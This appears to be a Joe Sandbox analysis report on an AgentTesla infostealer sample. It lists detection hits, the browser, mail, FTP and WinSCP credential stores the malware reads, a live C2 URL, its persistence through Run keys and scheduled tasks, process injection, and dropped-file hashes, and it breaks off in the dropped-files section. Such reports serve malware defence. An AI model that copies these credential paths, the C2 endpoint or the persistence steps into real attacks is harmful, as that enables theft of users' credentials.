                  Source: Yara matchFile source: 0.2.pdP5Rv9pPW.exe.3996170.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: pdP5Rv9pPW.exe PID: 5704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5224, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1608, type: MEMORYSTR
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: Yara matchFile source: 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5224, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1608, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 2.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pdP5Rv9pPW.exe.3996170.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pdP5Rv9pPW.exe.39ca790.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.pdP5Rv9pPW.exe.3996170.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: pdP5Rv9pPW.exe PID: 5704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5224, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1608, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  1
                  Valid Accounts                  		211
                  Windows Management Instrumentation                  		1
                  Valid Accounts                  		1
                  Valid Accounts                  		1
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		1
                  Account Discovery                  		Remote Services11
                  Archive Collected Data                  		Exfiltration Over Other Network Medium1
                  Encrypted Channel                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts1
                  Shared Modules                  		1
                  Scheduled Task/Job                  		1
                  Access Token Manipulation                  		11
                  Deobfuscate/Decode Files or Information                  		11
                  Input Capture                  		114
                  System Information Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		Exfiltration Over Bluetooth1
                  Non-Application Layer Protocol                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain Accounts1
                  Exploitation for Client Execution                  		1
                  Registry Run Keys / Startup Folder                  		311
                  Process Injection                  		21
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		221
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		Automated Exfiltration11
                  Application Layer Protocol                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local Accounts1
                  Scheduled Task/Job                  		Logon Script (Mac)1
                  Scheduled Task/Job                  		1
                  Software Packing                  		NTDS1
                  Process Discovery                  		Distributed Component Object Model11
                  Input Capture                  		Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon Script1
                  Registry Run Keys / Startup Folder                  		1
                  Masquerading                  		LSA Secrets141
                  Virtualization/Sandbox Evasion                  		SSH1
                  Clipboard Data                  		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common1
                  Valid Accounts                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                  Access Token Manipulation                  		DCSync1
                  System Owner/User Discovery                  		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job141
                  Virtualization/Sandbox Evasion                  		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)311
                  Process Injection                  		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                  Hidden Files and Directories                  		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 691823 Sample: pdP5Rv9pPW.exe Startdate: 28/08/2022 Architecture: WINDOWS Score: 100 64 Snort IDS alert for network traffic 2->64 66 Multi AV Scanner detection for domain / URL 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 6 other signatures 2->70 7 pdP5Rv9pPW.exe 4 2->7         started        11 fghn.exe 3 2->11         started        13 excel.exe 1 2->13         started        15 excel.exe 1 2->15         started        process3 file4 60 C:\Users\user\AppData\...\pdP5Rv9pPW.exe.log, ASCII 7->60 dropped 84 Writes to foreign memory regions 7->84 86 Injects a PE file into a foreign processes 7->86 17 vbc.exe 17 4 7->17         started        22 cmd.exe 3 7->22         started        24 cmd.exe 2 7->24         started        26 cmd.exe 1 7->26         started        88 Multi AV Scanner detection for dropped file 11->88 90 Machine Learning detection for dropped file 11->90 28 vbc.exe 3 11->28         started        30 cmd.exe 1 11->30         started        36 2 other processes 11->36 92 Document exploit detected (process start blacklist hit) 13->92 94 Injects files into Windows application 13->94 32 conhost.exe 13->32         started        34 conhost.exe 15->34         started        signatures5 process6 dnsIp7 62 141.98.6.75, 49717, 49753, 80 CMCSUS Germany 17->62 54 C:\Users\user\AppData\Roaming\...\excel.exe, PE32 17->54 dropped 72 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->72 74 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 17->74 76 Tries to steal Mail credentials (via file / registry access) 17->76 82 4 other signatures 17->82 56 C:\Users\user\AppData\Roaming\fghn\fghn.exe, PE32 22->56 dropped 58 C:\Users\user\...\fghn.exe:Zone.Identifier, ASCII 22->58 dropped 38 conhost.exe 22->38         started        78 Uses schtasks.exe or at.exe to add and modify task schedules 24->78 40 conhost.exe 24->40         started        42 conhost.exe 26->42         started        44 schtasks.exe 1 26->44         started        80 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->80 46 conhost.exe 30->46         started        48 schtasks.exe 1 30->48         started        50 conhost.exe 36->50         started        52 conhost.exe 36->52         started        file8 signatures9 process10

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  pdP5Rv9pPW.exe66%VirustotalBrowse
                  pdP5Rv9pPW.exe51%ReversingLabsWin32.Trojan.Mardom
                  pdP5Rv9pPW.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\fghn\fghn.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\excel\excel.exe2%MetadefenderBrowse
                  C:\Users\user\AppData\Roaming\excel\excel.exe0%ReversingLabs
                  C:\Users\user\AppData\Roaming\fghn\fghn.exe51%ReversingLabsWin32.Trojan.Mardom

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  2.0.vbc.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://141.98.6.756%VirustotalBrowse
                  http://141.98.6.750%Avira URL Cloudsafe
                  http://141.98.6.75/weption/inc/0986372054b5f8.phpa0%Avira URL Cloudsafe
                  http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                  http://141.98.6.75/weption/inc/0986372054b5f8.php11%VirustotalBrowse
                  http://141.98.6.75/weption/inc/0986372054b5f8.php100%Avira URL Cloudphishing
                  https://api.ipify.org%appdata0%URL Reputationsafe
                  http://141.98.6.75/weption/inc/0986372054b5f8.phpa(0%Avira URL Cloudsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                  http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
                  http://ZWXWPK.com0%Avira URL Cloudsafe
                  http://141.98.6.7540%Avira URL Cloudsafe
                  http://go.microsoft0%Avira URL Cloudsafe
                  http://X7rzdy8x3IrJP.net0%Avira URL Cloudsafe
                  https://api.ipify.org%0%URL Reputationsafe
                  http://141.98.6.75/weption/inc/0986372054b5f8.php127.0.0.1POST0%Avira URL Cloudsafe
                  https://di.98.6.75/weption/inc/0986372054b5f8.php0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://141.98.6.75/weption/inc/0986372054b5f8.phptrue
                  • 11%, Virustotal, Browse
                  • Avira URL Cloud: phishing
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://141.98.6.75vbc.exe, 00000002.00000002.541792222.0000000006E02000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.589800021.0000000007571000.00000004.00000800.00020000.00000000.sdmptrue
                  • 6%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://141.98.6.75/weption/inc/0986372054b5f8.phpavbc.exe, 00000017.00000002.583884404.000000000552A000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://127.0.0.1:HTTP/1.1vbc.exe, 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		low
                  https://api.ipify.org%appdatavbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		low
                  http://141.98.6.75/weption/inc/0986372054b5f8.phpa(vbc.exe, 00000017.00000002.583884404.000000000552A000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwvbc.exe, 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://DynDns.comDynDNSnamejidpasswordPsi/Psivbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://ZWXWPK.comvbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://141.98.6.754vbc.exe, 00000002.00000002.541792222.0000000006E02000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.589800021.0000000007571000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  		low
                  http://go.microsoftexcel.exe, 0000000C.00000002.397005792.00000000006FA000.00000004.00000010.00020000.00000000.sdmp, excel.exe, 00000010.00000002.413724237.00000000004FA000.00000004.00000010.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000002.00000002.541792222.0000000006E02000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.589800021.0000000007571000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://X7rzdy8x3IrJP.netvbc.exe, 00000017.00000002.590068919.00000000075B6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://api.ipify.org%vbc.exe, 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		low
                    http://141.98.6.75/weption/inc/0986372054b5f8.php127.0.0.1POSTvbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://di.98.6.75/weption/inc/0986372054b5f8.phpvbc.exe, 00000017.00000002.583884404.000000000552A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    141.98.6.75
                    		unknownGermany
                    		33657CMCSUStrue

                    General Information

                    Joe Sandbox Version:35.0.0 Citrine
                    Analysis ID:691823
                    Start date and time:2022-08-28 17:18:06 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 8m 19s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:pdP5Rv9pPW.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:36
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.expl.evad.winEXE@32/7@0/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 97%
                    • Number of executed functions: 125
                    • Number of non-executed functions: 2
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Adjust boot time
                    • Enable AMSI

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    17:19:31API Interceptor595x Sleep call for process: vbc.exe modified
                    17:19:31AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run excel C:\Users\user\AppData\Roaming\excel\excel.exe
                    17:19:32Task SchedulerRun new task: Nafifas path: "C:\Users\user\AppData\Roaming\fghn\fghn.exe"
                    17:19:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run excel C:\Users\user\AppData\Roaming\excel\excel.exe

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    141.98.6.75BL Document.exeGet hashmaliciousBrowse
                    • 141.98.6.75/500/inc/9bce52518beca5.php
                    New Order15522.png.exeGet hashmaliciousBrowse
                    • 141.98.6.75/500/inc/9bce52518beca5.php
                    PaymentAdvise.exeGet hashmaliciousBrowse
                    • 141.98.6.75/500/inc/9bce52518beca5.php

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    CMCSUS1DCAB4CDFFDF269EA33719990AC81C515345B50FE1C60.exeGet hashmaliciousBrowse
                    • 95.214.24.96
                    00C0934AF824603BEF01CE8A5D9FCBD0E97432C877D40.exeGet hashmaliciousBrowse
                    • 95.214.24.96
                    Host Ip Js StartUp.exeGet hashmaliciousBrowse
                    • 171.22.30.21
                    Quote_PDF.jsGet hashmaliciousBrowse
                    • 171.22.30.21
                    E52E6BBF7705F9B90E4A20F2935CB86EE6078035F14D8.exeGet hashmaliciousBrowse
                    • 95.214.24.96
                    Request Quote_PDF.jsGet hashmaliciousBrowse
                    • 171.22.30.21
                    Purchase Order for Atmosphere Manufacturers 776778GH.exeGet hashmaliciousBrowse
                    • 171.22.30.205
                    F06154D372FA1CD4D5E9C1D5956646C9B4DD80DAB46AB.exeGet hashmaliciousBrowse
                    • 95.214.24.96
                    Priljevu_0080386732.xllGet hashmaliciousBrowse
                    • 171.22.30.72
                    Payment Quote_PDF.jsGet hashmaliciousBrowse
                    • 171.22.30.21
                    Payment Quote_PDF.jsGet hashmaliciousBrowse
                    • 171.22.30.21
                    BL Document.exeGet hashmaliciousBrowse
                    • 141.98.6.75
                    SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.10071.exeGet hashmaliciousBrowse
                    • 171.22.30.205
                    Payment_PDF.jsGet hashmaliciousBrowse
                    • 171.22.30.21
                    RLsp6WwSVA.exeGet hashmaliciousBrowse
                    • 95.214.24.180
                    BjxrrngUY0.exeGet hashmaliciousBrowse
                    • 171.22.30.72
                    http://172.245.120.8/pdfreader.exeGet hashmaliciousBrowse
                    • 171.22.30.72
                    cBuu3xhLbb.docxGet hashmaliciousBrowse
                    • 171.22.30.211
                    z3hir.x86Get hashmaliciousBrowse
                    • 216.45.216.152
                    Payment_pdf.jsGet hashmaliciousBrowse
                    • 171.22.30.21

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    C:\Users\user\AppData\Roaming\excel\excel.exeSecuriteInfo.com.W32.AIDetectNet.01.9473.exeGet hashmaliciousBrowse
                      SecuriteInfo.com.W32.AIDetectNet.01.10857.exeGet hashmaliciousBrowse
                        SecuriteInfo.com.W32.AIDetectNet.01.20458.exeGet hashmaliciousBrowse
                          Doc151.pif.exeGet hashmaliciousBrowse
                            Doc0627.exeGet hashmaliciousBrowse
                              SecuriteInfo.com.W32.AIDetectNet.01.1410.exeGet hashmaliciousBrowse
                                Request For Quotation And Sample.pdf.exeGet hashmaliciousBrowse
                                  RFQ.exeGet hashmaliciousBrowse
                                    INVOICE.exeGet hashmaliciousBrowse
                                      SecuriteInfo.com.IL.Trojan.MSILZilla.13134.2490.exeGet hashmaliciousBrowse
                                        SecuriteInfo.com.W32.AIDetectNet.01.2799.exeGet hashmaliciousBrowse
                                          gqyMDfZZ4K.exeGet hashmaliciousBrowse
                                            Neves n 0rder.exeGet hashmaliciousBrowse
                                              products specification.exeGet hashmaliciousBrowse
                                                0JupZJZDCk.exeGet hashmaliciousBrowse
                                                  TT COPY.exeGet hashmaliciousBrowse
                                                    IAENMAIL-A4-220222-0830-0005036.pdf.exeGet hashmaliciousBrowse
                                                      0000002065.pdf.exeGet hashmaliciousBrowse
                                                        ldin.exeGet hashmaliciousBrowse
                                                          2de5fe686b665d9aeb98b075fb139e33fffe278986a15.exeGet hashmaliciousBrowse

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fghn.exe.log

                                                            Download File
                                                            Process:C:\Users\user\AppData\Roaming\fghn\fghn.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):425
                                                            Entropy (8bit):5.340009400190196
                                                            Encrypted:false
                                                            SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
                                                            MD5:CC144808DBAF00E03294347EADC8E779
                                                            SHA1:A3434FC71BA82B7512C813840427C687ADDB5AEA
                                                            SHA-256:3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
                                                            SHA-512:A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pdP5Rv9pPW.exe.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\pdP5Rv9pPW.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):425
                                                            Entropy (8bit):5.340009400190196
                                                            Encrypted:false
                                                            SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
                                                            MD5:CC144808DBAF00E03294347EADC8E779
                                                            SHA1:A3434FC71BA82B7512C813840427C687ADDB5AEA
                                                            SHA-256:3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
                                                            SHA-512:A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
                                                            Malicious:true
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..

                                                            C:\Users\user\AppData\Roaming\excel\excel.exe

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):2688096
                                                            Entropy (8bit):6.409257767499659
                                                            Encrypted:false
                                                            SSDEEP:49152:PAa87OQFMC/tWcHUgeRjRKW+0UpzIrFjB5u901ACUTum:PAa87zLtWI6jX+0UFIrZ//1a
                                                            MD5:B3A917344F5610BEEC562556F11300FA
                                                            SHA1:F7B1AC747E7705A21ACDD582B63800016BE21774
                                                            SHA-256:7BA4838E3356B69254730E891ADD84092E3143016A515FF3E990CE19874A2459
                                                            SHA-512:2D1515D75C3E5870F2FB57B321E02CF9611D30F3716A5670F0C32781AEB96576508B3B1C9717B2AC041B7752865842DD8AF7AF712988FF90FE3E6847821FFE60
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Metadefender, Detection: 2%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: SecuriteInfo.com.W32.AIDetectNet.01.9473.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.W32.AIDetectNet.01.10857.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.W32.AIDetectNet.01.20458.exe, Detection: malicious, Browse
                                                            • Filename: Doc151.pif.exe, Detection: malicious, Browse
                                                            • Filename: Doc0627.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.W32.AIDetectNet.01.1410.exe, Detection: malicious, Browse
                                                            • Filename: Request For Quotation And Sample.pdf.exe, Detection: malicious, Browse
                                                            • Filename: RFQ.exe, Detection: malicious, Browse
                                                            • Filename: INVOICE.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.IL.Trojan.MSILZilla.13134.2490.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.W32.AIDetectNet.01.2799.exe, Detection: malicious, Browse
                                                            • Filename: gqyMDfZZ4K.exe, Detection: malicious, Browse
                                                            • Filename: Neves n 0rder.exe, Detection: malicious, Browse
                                                            • Filename: products specification.exe, Detection: malicious, Browse
                                                            • Filename: 0JupZJZDCk.exe, Detection: malicious, Browse
                                                            • Filename: TT COPY.exe, Detection: malicious, Browse
                                                            • Filename: IAENMAIL-A4-220222-0830-0005036.pdf.exe, Detection: malicious, Browse
                                                            • Filename: 0000002065.pdf.exe, Detection: malicious, Browse
                                                            • Filename: ldin.exe, Detection: malicious, Browse
                                                            • Filename: 2de5fe686b665d9aeb98b075fb139e33fffe278986a15.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........d..O..O..O......O......O..v...O..v...O.....O......O.....O..=:..O..=:..O..=:..O..=:..O..v...O..O...N.......O......O......O......O..Rich.O..........PE..L....`.Z.........."......."..8............... "...@.......................... )......!)...@...... ..................d.".V.....#.......#.L.............(.`>....'.46....".T...........................`...@.............#..............................text...d."......."................. ..`.data...,.....".......".............@....idata........#.......#.............@..@.tls..........#.......#.............@....rsrc...L.....#.......#.............@..@.reloc..46....'..8....'.............@..B........................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Roaming\fghn\fghn.exe

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\cmd.exe
